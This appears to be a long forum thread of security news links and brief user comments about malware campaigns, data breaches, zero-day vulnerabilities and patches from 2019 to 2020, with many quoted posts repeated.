Cybersecurity Advisory Notice
https://www.foxitsoftware.com/support/security-advisories.php
-
Revealed: How a secret Dutch mole aided the U.S.-Israeli Stuxnet cyberattack on Iran
https://www.yahoo.com/news/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html
-
41% of Consumers Still Use Unsupported or Nearly Expired Operating Systems
https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os
-
41% of Consumers Still Use Unsupported or Nearly Expired Operating Systems
https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os
My surprise is that it is only 41% :)
-
41% of Consumers Still Use Unsupported or Nearly Expired Operating Systems
https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os
My surprise is that it is only 41% :)
And we belong to those 41% ;D
-
41% of Consumers Still Use Unsupported or Nearly Expired Operating Systems
https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os (https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os)
My surprise is that it is only 41% :)
And we belong to those 41% ;D
Happy to be part of the 59%. :)
-
Spammers abuse Snowden's new book to spread emotet malware trojan downloader infections.
Read: https://blog.malwarebytes.com/botnets/2019/09/emotet-malspam-campaign-uses-snowdens-new-book-as-lure/
We cannot tell for sure, such malware spam campaigns come from average cybercriminals or with the blessing of some state actors,
consider: https://www.theverge.com/2019/9/17/20870706/edward-snowden-book-us-government-justice-lawsuit-profits-release
Think of groups like APT28, DarkMatter and other groups that operate with government consent of sorts.
Analyzing one example from South Africa in Afrikaans & US American English:
See: https://any.run/report/821e3f454016615879c524b7b2604c21f783b062f4c9756993a2be75e08d8820/ea4d097e-bc52-4ac1-bcc1-6acee3cd47ee
Other information on this malware campaign:
https://isc.sans.edu/diary/More+Malspam+pushing+Emotet+malware/23083
on forwarding port: https://www.google.com/search?client=avast&ei=RFyLXfWLHYLMwQKU6Z-gAw&q=port+7080+used+for+malware&oq=port+7080+used+for+malware&gs_l=psy-ab.12..33i160.526.2228..3679...0.2..2.786.4145.2-3j5-3j2......0....1..gws-wiz.......0i71j0i22i30.S9TZ0mtzXLA&ved=0ahUKEwj1vY_F--vkAhUCZlAKHZT0BzQQ4dUDCAs
detection: https://www.virustotal.com/gui/url/cfe00e649b459de311f14bc751439f6ada69b4462f4251399b3d250447791bfa/detection
On infesting sw-cp server: https://toolbar.netcraft.com/site_report?url=http%3A%2F%2Feuve264289.serverprofi24.de%2F
On the zero-day being abused: https://blogs.cisco.com/security/plesk-0-day-targets-web-servers
On that particular launching IP: https://www.shodan.io/host/62.75.171.248
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Google Chrome Keystone is modifying /var symlink on non SIP Macs causing Boot Issues
https://mrmacintosh.com/google-chrome-keystone-is-modifying-var-symlink-on-non-sip-macs-causing-boot-issues/
https://support.google.com/chrome/thread/15235262
-
Malicious HTA node.js malware, not just for spammers.
Cisco & Microsoft warn users.
See: https://www.trustedsec.com/2015/07/malicious-htas/
Re: -https://github.com/InQuest/malware-samples/tree/master/2019-04-Malicious-HTA-file
and read: https://www.cybersecurity-help.cz/blog/698.html
polonus
-
Malicious HTA node.js malware, not just for spammers.
Cisco & Microsoft warn users.
See: https://www.trustedsec.com/2015/07/malicious-htas/
Re: -https://github.com/InQuest/malware-samples/tree/master/2019-04-Malicious-HTA-file
and read: https://www.cybersecurity-help.cz/blog/698.html
polonus
Divergent: "Fileless" NodeJS Malware Burrows Deep Within the Host
https://blog.talosintelligence.com/2019/09/divergent-analysis.html
https://www.virustotal.com/gui/file/47b5dac9152220fbbf122eff89ac93d42e9196f5ab665a2a6d99594246ab8a81/detection
https://www.virustotal.com/gui/file/062688aec1bdf1208bd72a77696e1fbcd1076f54bd6e59141ed12b6f8e3ba32c/detection
-
Security Attacks via Malicious QR Codes:
Read: https://resources.infosecinstitute.com/security-attacks-via-malicious-qr-codes/
Various generators for various purposes:
https://www.the-qrcode-generator.com/
http://goqr.me/
http://www.qr-code-generator.com/
http://www.qrstuff.com/
https://scan.me/qr-code-generator
A QR code has an unlimited lifespan, PHISHING is the main attack vector for malicious QR Code.
info credits for the above information go to INFOSEC.'s Pavitra Shankdhar
polonus
-
Comodo Forums Breached, Data of Over 170,000 Users Up for Grabs
https://www.bleepingcomputer.com/news/security/comodo-forums-breached-data-of-over-170-000-users-up-for-grabs/
-
Comodo Forums Breached, Data of Over 170,000 Users Up for Grabs
https://www.bleepingcomputer.com/news/security/comodo-forums-breached-data-of-over-170-000-users-up-for-grabs/ (https://www.bleepingcomputer.com/news/security/comodo-forums-breached-data-of-over-170-000-users-up-for-grabs/)
Some of us know first hand that no forum is ever 100% safe. Actually, nothing is which is why we need security.
-
Cybercrime is everywhere, read about Predator the Thief, a malware stealer, here:
https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html (info credits go to Fortinet's).
One of the launch IPs for this: https://www.shodan.io/host/18.219.205.14
Not detected as such at VT: https://www.virustotal.com/gui/url/b7cbb3ffcdd2172d17328a0e0fd45a67844e2d557c91cf35284339e064b3fa57/details
Stumbled upon this malbot here: http://cybercrime-tracker.net/index.php
where one can meet more notorious members of this unwelcome family ;)
polonus
-
Russian hackers modify Chrome and Firefox to track secure web traffic
The perpetrators may have Russian government support.
https://www.engadget.com/2019/10/06/russian-hackers-modify-chrome-firefox/?guccounter=1&guce_referrer=aHR0cHM6Ly9pdGF2aXNlbi5uby8yMDE5LzEwLzA3L3J1c3Npc2tlLWhhY2tlcmUtaGFyLW1vZGlmaXNlcnQtY2hyb21lLW9nLWZpcmVmb3gtbXVsaWdlbnMtbWVkLXJ1c3Npc2tlLW15bmRpZ2hldGVyLWktcnlnZ2VuLw&guce_referrer_sig=AQAAANa41GseYgc442zehSlhCKHRYMthxO69f_j7L_6bLGUjRkrtO2FboKmw9jaUShXYfGlssPH8xO-5p1GqSkHuknWQ3bVOVIHv0k1HIaW5kNpN2G8PDe8wRwy5eoqb-snsi9Kgqvi4HDLVA9ZO2YhI2H8t_w495npwxMPsuyE2kMZd
-
750 end-of-life servers removed from the Tor-network by Tor Project.
Read: https://blog.torproject.org/removing-end-life-relays-network
Why is this important?
On the importance of using ioc's for tor-c-2, read:
https://socprime.com/en/blog/wannacry-no-more-ransomware-worm-iocs-tor-c2-and-technical-analysis-siem-rules/
C&C servers are the malware online sockpuppets:
https://securityaffairs.co/wordpress/89237/malware/mirai-botnet-tor-c2.html &
https://www.microsoft.com/security/blog/2014/03/05/sefnits-tor-botnet-cc-details/
Malware abuse with tor-loc
https://www.symantec.com/security-center/writeup/2013-090611-2333-99
for Mevade backdoor e.v.
Tor should get an enhanced security effort. A continuous drive to protect it to keep tor and the general user more safe and secure.
(info credits go to #sockpuppet)
polonus
-
Magecart malware, still alive and kicking: brought to your webshop by 15 active cybercrime groups. ::) :o
Read: https://www.theregister.co.uk/2019/10/04/magecart/
Check whether your Magento shop is vulnerable here: https://www.magereport.com/
polonus
-
Vulnerability in iTunes and iCloud allowed Windows PC ransomware infection
https://9to5mac.com/2019/10/11/vulnerability-in-itunes/
-
Vulnerability in iTunes and iCloud allowed Windows PC ransomware infection
https://9to5mac.com/2019/10/11/vulnerability-in-itunes/ (https://9to5mac.com/2019/10/11/vulnerability-in-itunes/)
It's already been patched. Update to fix the vulnerability.
-
WordPress 5.2.4 Security Release
https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
-
Hacker Breached Servers Belonging to Multiple VPN Providers
https://www.bleepingcomputer.com/news/security/hacker-breached-servers-belonging-to-multiple-vpn-providers/
https://thehackernews.com/2019/10/nordvpn-data-breach.html
-
Hi Pondus,
I sense we have to prepare for some negative VPN news breaking.
Many of such services have now outgrown their initial possibilities,
and we soon gonna meet the manco's. At least i.m.h.o.
Hope I am wrong,
polonus aka Damian
-
Again Magecart infections via PIO: https://sansec.io/labs/2018/10/23/magecart-extension-0days/
Here about vendors that were hit: https://www.theregister.co.uk/2018/11/02/kitronik_online_shop_malware/
So, hop over to https://www.magereport.com/ and scan your Magento shop CMS.
polonus
-
L.S.
When you have read the link content in the previous, you now know about POI (PHP Object Injection) and one of the attack vectors. You wanna know about further attack vectors, they are being introduced here: http://www.tecapi.com/public/relative-vulnerability-rating-gui.jsp and then here: http://www.tecapi.com/public/rvr-view-attack-vector-gui.jsp?antiCsrfToken=null&attackVectorId=10 and see why these attack vectors are critical.
You scan your code for flaws, making it susceptible to POI.
pol
-
7 million Adobe Creative Cloud accounts exposed to the public
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
-
Maxthon Browser for Windows - Unquoted Search Path and Potential Abuses (CVE-2019-16647)
https://safebreach.com/Post/Maxthon-Browser-for-Windows-Unquoted-Search-Path-and-Potential-Abuses-CVE-2019-16647
-
Nasty PHP7 remote code execution bug exploited in the wild on Nginx webservers
through a specially crafted URL, read:
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
See the PoC: https://github.com/neex/phuip-fpizdam
Again non validated PHP is the can of worms it always has been.
You could open this box of Pandora before you are aware.
polonus
-
Oops — Adobe leaves 7.5 million Creative Cloud accounts exposed
https://thenextweb.com/security/2019/10/28/oops-adobe-leaves-7-5-million-creative-cloud-accounts-exposed/
-
Oops — Adobe leaves 7.5 million Creative Cloud accounts exposed
https://thenextweb.com/security/2019/10/28/oops-adobe-leaves-7-5-million-creative-cloud-accounts-exposed/
See Reply #5994. ;)
-
Notice of Potential Payment Card Incident
http://www.krystal.com/security/
-
Network Solutions - Important Security Information
https://notice.networksolutions.com/
-
A Major Google Chrome Security Flaw Was Discovered. If You Use Chrome, Update Right Now
https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html (https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html)
v78.0.3904.70 needs to be updated to v78.0.3904.87
-
A Major Google Chrome Security Flaw Was Discovered. If You Use Chrome, Update Right Now
https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html (https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html)
v78.0.3904.70 needs to be updated to v78.0.3904.87
That article is from Aug 30th, is it still an issue?
-
A Major Google Chrome Security Flaw Was Discovered. If You Use Chrome, Update Right Now
https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html (https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html)
v78.0.3904.70 needs to be updated to v78.0.3904.87
That article is from Aug 30th, is it still an issue?
https://mashable.com/article/google-chrome-halloween-zero-day-exploit/ (https://mashable.com/article/google-chrome-halloween-zero-day-exploit/)
-
A Major Google Chrome Security Flaw Was Discovered. If You Use Chrome, Update Right Now
https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html (https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html)
v78.0.3904.70 needs to be updated to v78.0.3904.87
That article is from Aug 30th, is it still an issue?
https://mashable.com/article/google-chrome-halloween-zero-day-exploit/ (https://mashable.com/article/google-chrome-halloween-zero-day-exploit/)
Okay, thanks.
-
Second zero-day still unpatched by Google Chrome:
https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/
It is a so-called waterhole exploit being abused.
-http://code.jquery.cdn.behindcorona.com/ has already bewn taken down.
pol
-
More for the cat and mouse game between shodan and user.
http://romcheckfail.com/blocking-shodan-keeping-shodan-io-in-the-dark-from-scanning/
Shodan is definitely a useful tool, and will help admins who dont realize what is exposed to the internet find out their weak points. It is also very useful for vulnerability assessments and getting metrics about services from the internet as whole. But it is also like all good things used by people who want to exploit the data within for personal gain or entertainment.
There are literally hudreds of thousands of interesting and exploitable items on shodan, just dont be one of them.
Quote credits go to Mike Hiltz
polonus
-
Hackers Breach ZoneAlarm's Forum Site — Outdated vBulletin to Blame
https://thehackernews.com/2019/11/zonealarm-forum-data-breach.html
-
New NextCry Ransomware Encrypts Data on NextCloud Linux Servers
https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/
-
Visa warns webshops against - code that steals creditcard-data:
Read: https://usa.visa.com/dam/VCOM/global/support-legal/documents/pfd-identifies-new-javascript-skimmer.pdf
This JavaScript skimmer malware Visa is called "Pipka"* (* brzydki wyraz n.p. po polsku (dimin.)
and you won't find the expression in a Polish dictionary).
It is the first malcode of its kind that removes itself from compromised websites (html).
polonus
-
Three minor Microsoft flaws can easily add up to one big one:
https://www.f5.com/labs/articles/threat-intelligence/how-three-low-risk-vulnerabilities-become-one-high-24995
Better safe than sorry. Mitigate those risks you run.
polonus
-
‘Magic: The Gathering’ game maker exposed 452,000 players’ account data
https://techcrunch.com/2019/11/16/magic-the-gathering-wizards-data-exposure/
-
Macy's Customer Payment Info Stolen in Magecart Data Breach
https://www.bleepingcomputer.com/news/security/macys-customer-payment-info-stolen-in-magecart-data-breach/
-
Exposed database left terabyte of travelers' data open to the public
https://www.cnet.com/news/exposed-database-left-terabyte-of-travelers-data-open-to-the-public/
https://www.vpnmentor.com/blog/report-accorhotels-leak/
-
What to do about unblockable web trackers?
Read: https://www.theregister.co.uk/2019/11/21/ublock_origin_firefox_unblockable_tracker/
Firefox has thwarted this new apparently unblockable tracker.
For Chrome, there is no DNS API available, and so no easy way to detect this,"
As web tracking is a major part of Google's core business, they want to go forward with this,
allowing advertisers to create unique IDs for every ad impression they serve, information
that could then be associated with individual users.
Ads could contain malware, so I block with uOrigin and uMatrix in Cliqz Internet browser
(a particular firefox private browser flaw).
Surveillance capitalism by Facebook and Google goes over the top,
according to Amnesty Int. and in it's effects is threatening human rights.
Further background information:
Electronic Frontier Foundation:
Surveillance Self-Defense Guide
https://ssd.eff.org/
Book: Fake It! by Steffan Heuer & Pernille Tranberg
Protect your digital identity
https://www.digital-selfdefense.com/
polonus aka Damian (volunteer 3rd party cold recon website security analyst and website error-hunter)
P.S. A solution for chrome lies in these less known settings: https://support.google.com/chrome/answer/2364824
-
Edenred announces malware infection
https://www.globenewswire.com/news-release/2019/11/22/1951181/0/en/Edenred-announces-malware-infection.html
-
Bulletin: HPE SAS Solid State Drives - Critical Firmware Upgrade Required for Certain HPE SAS Solid State Drive Models to Prevent Drive Failure at 32,768 Hours of Operation
https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00092491en_us
-
12.000 PHISHING attacks from state-actors during last three months.
Google warned against and detected such attacks,
https://www.blog.google/technology/safety-security/threat-analysis-group/protecting-users-government-backed-hacking-and-disinformation/
Also android attacks performed by state hackers are being made public, to make end-users more aware and seek protection.
Found to be most active - USA State actors and state actors from Pakistan.
polonus
-
Magento Marketplace Security Update
https://magento.com/blog/magento-news/magento-marketplace-security-update
-
Facebook and Twitter say hundreds of users accidentally gave improper access to personal data through third-party apps
https://www.cnbc.com/2019/11/25/facebook-and-twitter-says-users-gave-improper-access-to-personal-data.html
-
Mixcloud data breach exposes over 20 million user records
https://techcrunch.com/2019/11/29/mixcloud-data-breach/
https://blog.mixcloud.com/2019/11/30/mixcloud-security-notice
-
Someone is Watching you!
User Privacy Under Relentless Attack by Trackers Following Every Click and Purchase
https://www.eff.org/press/releases/eff-report-exposes-explains-big-techs-personal-data-trackers-lurk-social-media
-
20 VPS providers to shut down on Monday, giving customers two days to save their data
https://www.zdnet.com/article/20-vps-providers-to-shut-down-on-monday-giving-customers-two-days-to-save-their-data/
-
Caution! Ryuk Ransomware decrypter damages larger files, even if you pay
https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/
-
https://blog.malwarebytes.com/threat-analysis/2019/12/hundreds-of-counterfeit-online-shoe-stores-injected-with-credit-card-skimmer/
So scan every webshop withMagento under 1.9.4.2 & PHP under 5.6.40 here: https://www.magereport.com/
in case of plenty vulnerabilities, do not go there and/or refrain from ever buying fake goods or being scammed out of your money.
If others cannot protect us, we have to fence for ourselves. Forewarned = forearmed.
polonus
Just a random webshop you have to shun because insecure: https://www.magereport.com/scan/?s=https://www.sarezalando.com/
Scan results say HIGH RISK website -> not patched, not installed, unprotected and unmaintained (on purpose as we find out now).
Damian
P.S. Not flagged at VT: https://www.virustotal.com/gui/ip-address/141.105.68.82/details
Probably coming from Russia (RBN website "Russian Business Network), not yet on Dr. Webs malicious websites list.
-
LifeLabs Data Breach Exposes Personal Info of 15 Million Customers
https://www.bleepingcomputer.com/news/security/lifelabs-data-breach-exposes-personal-info-of-15-million-customers/
https://customernotice.lifelabs.com/
-
Just watching an infested ad is enough to get infected.
Social engineering does the rest (if you fall for it or aren't using a decent blocker)
Visiting smut sites and then a fake smut site with malware-installer, portraying as a video-update, will infest you.
Re: https://blog.malwarebytes.com/threat-analysis/2019/12/spelevo-exploit-kit-debuts-new-social-engineering-trick/
polonus
-
Report: 267 million Facebook users IDs and phone numbers exposed online
https://www.comparitech.com/blog/information-security/267-million-phone-numbers-exposed-online/
-
Cyberattack hit computers of the Maastricht University in the Netherlands.
Clop ransomware, an AES cryptomix variant, launched by malcreants hiding behind a protonmail address.
Newer variants of the Clop ransomware also will disable av-protection.
The word clop comes from a word "Klop", Клоп in Russian, which is a term for a sort of bloodsucking bedbug,
but in this case it should be taken more to mean an equivalent of the technical term "bug". ????
We are waiting for a decryptor, but if professionally performed AES strenght, it is nearly uncrackable and cannot be defeated.
Infection methods are:
Spam email attachments or hyperlinks;
Insecure RDP connections;
Compromised or hacker-designed websites
Re-packed installers;
Keygens, cracks, and other executables;
Exploit kits, etc.
Authorities have been warning for this dangerous webthreat coming for months now.
And it took Maastricht University by surprise just before Christmas' Eve,
Info credits above go to: luntrus
polonus
-
Malcreants/cybercriminal-ransomware-developers do not like their adversaries, they really hate them.
Read: https://www.bbc.co.uk/news/resources/idt-sh/hated_and_hunted_the_computer_virus_malware_ransomware_cracker
See for instance how widespread this Syrk ransomware has spread:
https://maltiverse.com/search;query=gr9wgs94fg5sb3y8l.000webhostapp.com;page=1;sort=query_score
polonus
-
Attackers actively on the look-out for vulnerable Citrix-servers.
Read: https://support.citrix.com/article/CTX267027 (vulnerability)
80.000 vulnerable servers world-wide:
https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/
Hackers activity: https://twitter.com/GossiTheDog/status/1214892555306971138
Confirmed here: https://isc.sans.edu/forums/diary/A+Quick+Update+on+Scanning+for+CVE201919781+Citrix+ADC+Gateway+Vulnerability/25686/
Mitigation proposals (ther eis no patch available as yet): https://support.citrix.com/article/CTX267679
polonus
-
Beware of Amazon Prime Support Scams in Google Search Ads
https://www.bleepingcomputer.com/news/security/beware-of-amazon-prime-support-scams-in-google-search-ads/
-
On many sites Google Translate could mean a problem for potential attacks on 'window.opener',
read: https://webhint.io/docs/user-guide/hints/hint-disown-opener/#why-is-this-important (security-problem)
Where we have seen this: close all
disown-opener: 65 hints
hint #1: '<a class="goog-logo-link" href="-https://translat … -right: 3px" alt="Google Translate">Translate</a>' should have 'rel' attribute value include 'noopener' and 'noreferrer' keywords.
detected on -https://www.ninefornews … nos-fake-news-etc
<a class="goog-logo-link" href="-https://translate.google.com" target="_blank">
Also cdn.taboola dot com adware found on that page: https://www.joesandbox.com/analysis/152773/0/html
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Microsoft Outsourced Skype, Cortana Voice Analysis to China With Virtually No Security in Place
https://gizmodo.com/microsoft-outsourced-skype-cortana-voice-analysis-to-c-1840935163
-
Hack Cambridge’s young geniuses to take a crack at the Avast Secure Browser
https://blog.avast.com/avast-team-prepares-for-hack-cambridge (https://blog.avast.com/avast-team-prepares-for-hack-cambridge)
I personally can't wait for the results.
-
Hundreds of millions of cable modems are vulnerable to new Cable Haunt vulnerability
https://www.zdnet.com/article/hundreds-of-millions-of-cable-modems-are-vulnerable-to-new-cable-haunt-vulnerability/
What is Cable Haunt? https://cablehaunt.com/
-
130.000 Word Press CMS websites vulnerable because of holed plug-in.
Vulnerable plug-in = https://wordpress.org/plugins/iwp-client
You could get infested through a specially crafted request:
https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
168.000 Word Press websites already patched: https://wordpress.org/plugins/iwp-client/advanced/
Badly configured insecure Word Press CMS based on PHP stays a security liability i.m.h.o. by design.
polonus
-
TrickBot Now Uses a Windows 10 UAC Bypass to Evade Detection
https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001
Actively Exploited IE 11 Zero-Day Bug Gets Temporary Patch
https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/
https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001 (https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001)
Actively Exploited IE 11 Zero-Day Bug Gets Temporary Patch
https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/ (https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/)
https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html (https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html)
Savvy users have long since removed or at least turned off IE11. :)
-
Final Windows 7 Update Breaks Desktop Wallpaper Functionality
https://www.bleepingcomputer.com/news/microsoft/final-windows-7-update-breaks-desktop-wallpaper-functionality/
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/ (https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/)
MS states that they have contacted the users effected. I didn't get any notification.
Wonder if that means I'm not effected?
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/ (https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/)
MS states that they have contacted the users effected. I didn't get any notification.
Wonder if that means I'm not effected?
Let's hope so Bob, but only the guys at Microsoft can say for sure.
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/ (https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/)
MS states that they have contacted the users effected. I didn't get any notification.
Wonder if that means I'm not effected?
Let's hope so Bob, but only the guys at Microsoft can say for sure.
Access Misconfiguration for Customer Support Database
https://msrc-blog.microsoft.com/2020/01/22/access-misconfiguration-for-customer-support-database/
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/ (https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/)
MS states that they have contacted the users effected. I didn't get any notification.
Wonder if that means I'm not effected?
Let's hope so Bob, but only the guys at Microsoft can say for sure.
Access Misconfiguration for Customer Support Database
https://msrc-blog.microsoft.com/2020/01/22/access-misconfiguration-for-customer-support-database/ (https://msrc-blog.microsoft.com/2020/01/22/access-misconfiguration-for-customer-support-database/)
According to that article, Customer notification may still be ongoing.
"we were able to quickly fix this misconfiguration, investigate the situation, and begin notifying customers as appropriate."
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001 (https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001)
Actively Exploited IE 11 Zero-Day Bug Gets Temporary Patch
https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/ (https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/)
https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html (https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html)
Savvy users have long since removed or at least turned off IE11. :)
Microsoft's IE Zero-day Fix is Breaking Windows Printing
https://www.bleepingcomputer.com/news/security/microsofts-ie-zero-day-fix-is-breaking-windows-printing/
-
Mozilla has banned nearly 200 malicious Firefox add-ons over the last two weeks
https://www.zdnet.com/article/mozilla-has-banned-nearly-200-malicious-firefox-add-ons-over-the-last-two-weeks/
-
Final Windows 7 Update Breaks Desktop Wallpaper Functionality
https://www.bleepingcomputer.com/news/microsoft/final-windows-7-update-breaks-desktop-wallpaper-functionality/
Windows 7 To Get Post End of Life Update to Fix Wallpaper Bug
https://www.bleepingcomputer.com/news/microsoft/windows-7-to-get-post-end-of-life-update-to-fix-wallpaper-bug/
-
Linear eMerge E3 access controller actively being exploited
https://securitynews.sonicwall.com/xmlpost/linear-emerge-e3-access-controller-actively-being-exploited/
-
Emotet Gears Up to File (Your) Taxes
https://cofense.com/emotet-gears-file-taxes/
-
Most dangerous Emotet malware now evolves with a Wifi-Spreader (being detected only after two years' time :o )
Read analysis: https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/
polonus
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001 (https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001)
Actively Exploited IE 11 Zero-Day Bug Gets Temporary Patch
https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/ (https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/)
https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html (https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html)
Savvy users have long since removed or at least turned off IE11. :)
Microsoft's IE Zero-day Fix is Breaking Windows Printing
https://www.bleepingcomputer.com/news/security/microsofts-ie-zero-day-fix-is-breaking-windows-printing/
Microsoft Patches Actively Exploited Internet Explorer Zero-Day
https://www.bleepingcomputer.com/news/security/microsoft-patches-actively-exploited-internet-explorer-zero-day/
-
K-bot, an old-fashioned infector of executable files:
Read: https://securelist.com/kbot-sometimes-they-come-back/96157/ (info credits go to Kaspersky's Anna Malina).
polonus
-
Dangerous: "Zero-Day Code Injection and Persistence Technique",
Re: https://github.com/Cybellum/DoubleAgent
polonus
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html
Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/ (https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/)
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt (https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt)
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html (https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html)
Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm (https://www.cryptomuseum.com/intel/cia/rubicon.htm)
So how does this effect the average technology user?
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/ (https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/)
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt (https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt)
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html (https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html)
Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm (https://www.cryptomuseum.com/intel/cia/rubicon.htm)
So how does this effect the average technology user?
No idea. Interesting reading
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/ (https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/)
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt (https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt)
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html (https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html)
